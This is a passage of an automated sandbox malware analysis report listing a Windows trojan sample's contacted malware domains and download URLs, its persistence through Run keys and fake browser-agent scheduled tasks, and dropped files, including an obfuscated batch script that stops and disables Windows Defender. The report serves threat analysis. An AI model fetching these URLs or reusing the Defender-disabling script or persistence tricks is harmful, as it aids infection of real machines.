              http://91.219.236.97//l/f/9Z2CynwB3dP17SpzOnMI/019cd02588367c4185228009642767b5fca228df0%Avira URL Cloudsafe
              http://91.219.236.97//l/f/9Z2CynwB3dP17SpzOnMI/07191d3d9db3dbffa0d8f6d32b0cace6fdafa4660%Avira URL Cloudsafe
              http://toptelete.top/agrybirdsgamerept100%Avira URL Cloudmalware
              http://privacytoolzforyou-6000.top/downloads/toolspab2.exe100%Avira URL Cloudmalware
              http://hajezey1.top/100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              privacytoolzforyou-6000.top
              185.98.87.159
              truefalse
                high
                toptelete.top
                172.67.160.46
                truefalse
                  high
                  cdn.discordapp.com
                  162.159.135.233
                  truefalse
                    high
                    api.2ip.ua
                    77.123.139.190
                    truefalse
                      high
                      znpst.top
                      151.251.30.69
                      truefalse
                        high
                        nusurtal4f.net
                        45.141.84.21
                        truefalse
                          high
                          hajezey1.top
                          185.98.87.159
                          truefalse
                            high
                            sysaheu90.top
                            185.98.87.159
                            truefalse
                              high
                              telegalive.top
                              unknown
                              unknownfalse
                                high
                                xacokuo8.top
                                unknown
                                unknownfalse
                                  high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://sysaheu90.top/game.exetrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://cdn.discordapp.com/attachments/893177342426509335/903702020781907998/4D0A6361.jpgfalse
                                    high
                                    http://91.219.236.97/true
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpgfalse
                                      high
                                      https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpgfalse
                                        high
                                        http://91.219.236.97//l/f/9Z2CynwB3dP17SpzOnMI/019cd02588367c4185228009642767b5fca228dftrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://91.219.236.97//l/f/9Z2CynwB3dP17SpzOnMI/07191d3d9db3dbffa0d8f6d32b0cace6fdafa466true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://toptelete.top/agrybirdsgamerepttrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpgfalse
                                          high
                                          http://privacytoolzforyou-6000.top/downloads/toolspab2.exetrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://hajezey1.top/true
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpgfalse
                                            high

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://tempuri.org/DetailsDataSet1.xsdEA8A.exe, 00000018.00000000.417957368.0000000000FA2000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.287991711.0000000006840000.00000004.00000001.sdmpfalse
                                              high
                                              http://fontello.comC1B2.exefalse
                                                high
                                                http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 0000001B.00000000.419935360.000000000040C000.00000002.00020000.sdmpfalse
                                                  high

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  185.98.87.159
                                                  privacytoolzforyou-6000.topRussian Federation
                                                  205840VM-HOSTINGRUfalse
                                                  91.219.236.97
                                                  unknownHungary
                                                  56322SERVERASTRA-ASHUtrue
                                                  162.159.129.233
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  172.67.160.46
                                                  toptelete.topUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  216.128.137.31
                                                  unknownUnited States
                                                  20473AS-CHOOPAUStrue
                                                  162.159.135.233
                                                  cdn.discordapp.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  93.115.20.139
                                                  unknownRomania
                                                  202448MVPShttpswwwmvpsnetEUfalse

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:511954
                                                  Start date:29.10.2021
                                                  Start time:20:27:37
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 16m 30s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:25Kf6vSBoq.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:42
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winEXE@44/20@59/8
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 36.7% (good quality ratio 22.8%)
                                                  • Quality average: 36.2%
                                                  • Quality standard deviation: 35%
                                                  HCA Information:
                                                  • Successful, ratio: 56%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                  • HTTP Packets have been reduced
                                                  • TCP Packets have been reduced to 100
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 20.82.210.154, 209.197.3.8, 20.50.102.62, 80.67.82.235, 80.67.82.211
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/511954/sample/25Kf6vSBoq.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  20:29:22Task SchedulerRun new task: Firefox Default Browser Agent CEB8766898B1A0D6 path: C:\Users\user\AppData\Roaming\irjbuft
                                                  20:29:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\DF9C.exe
                                                  20:30:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\DF9C.exe
                                                  20:30:15API Interceptor8x Sleep call for process: 3D1.exe modified
                                                  20:30:21API Interceptor30x Sleep call for process: powershell.exe modified
                                                  20:30:40Task SchedulerRun new task: sqtvvs.exe path: C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                  20:30:42Task SchedulerRun new task: Firefox Default Browser Agent FC48AAD9FCF207F2 path: C:\Users\user\AppData\Roaming\fijbuft
                                                  20:30:54Task SchedulerRun new task: Firefox Default Browser Agent 679833BEA6CC7311 path: C:\Users\user\AppData\Roaming\ffjbuft
                                                  20:31:17AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\822d2d1a-03c6-47d8-aff0-f5a5897ff683\9C1A.exe" --AutoStart
                                                  20:31:35Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\822d2d1a-03c6-47d8-aff0-f5a5897ff683\9C1A.exe s>--Task
                                                  20:32:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\822d2d1a-03c6-47d8-aff0-f5a5897ff683\9C1A.exe" --AutoStart

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DF9C.exe.log
                                                  Process:C:\Users\user\AppData\Local\Temp\DF9C.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):520
                                                  Entropy (8bit):5.345981753770044
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLUE4K5E4Ks2wKDE4KhK3VZ9pKhk
                                                  MD5:044A637E42FE9A819D7E43C8504CA769
                                                  SHA1:6FCA27B1A571B73563C8424C84F4F64F3CBCBE2F
                                                  SHA-256:E88E04654826CE00CC7A840745254164DDBD175066D6E4EA6858BF0FE463EBB4
                                                  SHA-512:C9A74FA4154FA5E5951B0EEAC5330CA4BAC981FF9AD24C08575A76AD5D99CFB68556B9857C9C8209A1BFCB43F82E00F14962987A18A92A715F45AD0D4E4A718C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EA8A.exe.log
                                                  Process:C:\Users\user\AppData\Local\Temp\EA8A.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1039
                                                  Entropy (8bit):5.365622957937216
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                  MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                  SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                  SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                  SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                  C:\Users\user\AppData\Local\Temp\1105.tmp
                                                  Process:C:\Users\user\AppData\Local\Temp\CD0D.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1622408
                                                  Entropy (8bit):6.298350783524153
                                                  Encrypted:false
                                                  SSDEEP:24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
                                                  MD5:BFA689ECA05147AFD466359DD4A144A3
                                                  SHA1:B3474BE2B836567420F8DC96512AA303F31C8AFC
                                                  SHA-256:B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
                                                  SHA-512:8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L!y>.@.m.@.m.@.m...l.@.mg$.l.@.mg$.lN@.mg$.l.A.mg$.l.@.mg$.l.@.mg$.m.@.mg$.l.@.mRich.@.m........................PE..L...s<s............!.....,...................P....(K......................................@A.............................&..............8............h...Y.......N..`l..T............................................................................text....).......*.................. ..`RT...........@...................... ..`.data...dW...P.......0..............@....mrdata.h#.......$...>..............@....00cfg...............b..............@..@.rsrc...8............d..............@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\3D1.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:modified
                                                  Size (bytes):600064
                                                  Entropy (8bit):7.08622054901022
                                                  Encrypted:false
                                                  SSDEEP:12288:5sUIdOyImnTRTDjpz0e6LUDR+SiDkYj7:iD3ntTDjR0e6ogD
                                                  MD5:C1EB42674C5E7180ADEFEC71EE8B1D60
                                                  SHA1:4532F19A27443639D789F79231D127031AAE2E29
                                                  SHA-256:DFC50DE58C6339E624B60A7E6D5BCCC20297656CD80183379FAC54F11B3E6F56
                                                  SHA-512:20F845413A0D1FCE41F6206B62704CB14E019EA1874B5AAA37FD2220E9C0E8D4C672E9199179770E11D75634AB0C952F0E51B6937FBB0DC5EABD808C8451F3DF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L....)R_......................p.....P.............@...........................x.................................................P....@w..?....................w.0...0...............................(...@............................................text.............................. ..`.data....io.........................@....vito........0w.....................@....rsrc....?...@w..@..................@..@.reloc..."....w..$..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe
                                                  Process:C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):91000
                                                  Entropy (8bit):6.241345766746317
                                                  Encrypted:false
                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\test.bat
                                                  Process:C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8399
                                                  Entropy (8bit):4.665734428420432
                                                  Encrypted:false
                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                  C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                  Process:C:\Users\user\AppData\Local\Temp\DF9C.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:modified
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:6144:pkY0668MzX0oJgx6nrBdkBSrBHHHI6t7af9GH0WbcSDkTDhm6Xpic76vneCVvK36:phHmzXaNIWsUwgrNt1E/Z
                                                  MD5:AB823DF932B3C2941A9015848EBDB97B
                                                  SHA1:A7E2D46ADA3A42A3D32A96937C316340F2E62A5B
                                                  SHA-256:812D78A50A8DE210DBBCE12FDA210461770B8B928F8B3249DE80ECB68055F61E
                                                  SHA-512:59AC83CED7E0A68E7491812B494E715FC19BA2AA25EDBC0B5765792A1DC19432DBF8F5B671EA4EEBF590740C63EE1A50FE4B0FC716B986F6C5070B920F5C2325
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.|a.........."...0..............1... ........@.. ....................................`..................................1..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H............D......Q...................................................V#... ..A#... ..A&&*...0.......... QB.o.......(....&*..0.......... .n.m.......(....&*..0..J.........(....+.~.....(....,.........+..+..*......(....(.........(....(.........*...0..........(....(.....% t..(...+.....% .g..(...+.....% ..0.(...+...... H.NB(...+.....% .z..(...+.....% [/}h(...+.....% ....(...+.....% M.3(...+.....% ....(...+.....% ....(...+.....% _.C.(...+.....% ..&d(...+..... ...}(...++". ...
                                                  C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe
                                                  Process:C:\Users\user\AppData\Local\Temp\EA8A.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):91000
                                                  Entropy (8bit):6.241345766746317
                                                  Encrypted:false
                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\test.bat
                                                  Process:C:\Users\user\AppData\Local\Temp\EA8A.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):8399
                                                  Entropy (8bit):4.665734428420432
                                                  Encrypted:false
                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                  C:\Users\user\AppData\Local\Temp\6EC5.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):344064
                                                  Entropy (8bit):5.99188338211275
                                                  Encrypted:false
                                                  SSDEEP:6144:O0kWD+3Pz81AwPC4BVZ2LGuSoGZkk4mAzaV/:JZD+/CO4ULGuShkk4m1V/
                                                  MD5:3B947ED5AABDD775B1AFC31A5C4D39A0
                                                  SHA1:552AA072522F22A003CADD3BCAD5E4EB981A5CBB
                                                  SHA-256:8245AD87EEA6A1F19F658ADEF8A30B9A512760D866B7075BBF205D7A54296234
                                                  SHA-512:AE62F33E3B0DAE89BBD33481B50E6BA53F31AD8699D1570C8B03D73C2045E870CBA25A06CC3DCEA07D784CA688F63C2C335BD262B0722B4461D29AB54357C226
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...6.`......................p.....@.............@...........................t.....1...........................................P....Ps..?....................s.<...0...................................@............................................text.............................. ..`.data....io.........................@....lufulac.....@s.....................@....rsrc....?...Ps..@..................@..@.reloc..."....s..$..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\9C1A.exe
                                                  Process:C:\Windows\explorer.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):876032
                                                  Entropy (8bit):7.460770275761101
                                                  Encrypted:false
                                                  SSDEEP:24576:rllHH+L2668JnnVlA56Bl0vXiTfbm9CW9:rll+L2mtVlA5+cb
                                                  MD5:94A2C61443FDC38F87B7903D5FF979E7
                                                  SHA1:CB98E7B675EFCE00C9EAEC98B2B7F4C154B5E0D7
                                                  SHA-256:D89B90BED3CA49A3110AB8ABF95B27E42E87F31FA6427E32857F097DA65C58AB
                                                  SHA-512:698F87628375FA33BDDF97907DD09A95C1C20989D68D032E224330ED2EBFCEBC35DE4D0B4A1A3353C9840C76AE88F6D56640072F859D7C9ECD2560F276CB1B08
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Reputation:unknown
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ctw.Ctw.Ctw.,...ntw.,...atw.,...<tw.J...Dtw.Ctv.<tw.,...Btw.,...Btw.,...Btw.RichCtw.........PE..L...J..`......................p...................@...........................|................................................P....p{..?....................{.0...0...............................H...@............................................text............................... ..`.data....io.........................@....yuso........`{.....................@....rsrc....?...p{..@..................@..@.reloc..."....{..$...:..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\B82B.exe
                                                  Process:C:\Windows\explorer.exe
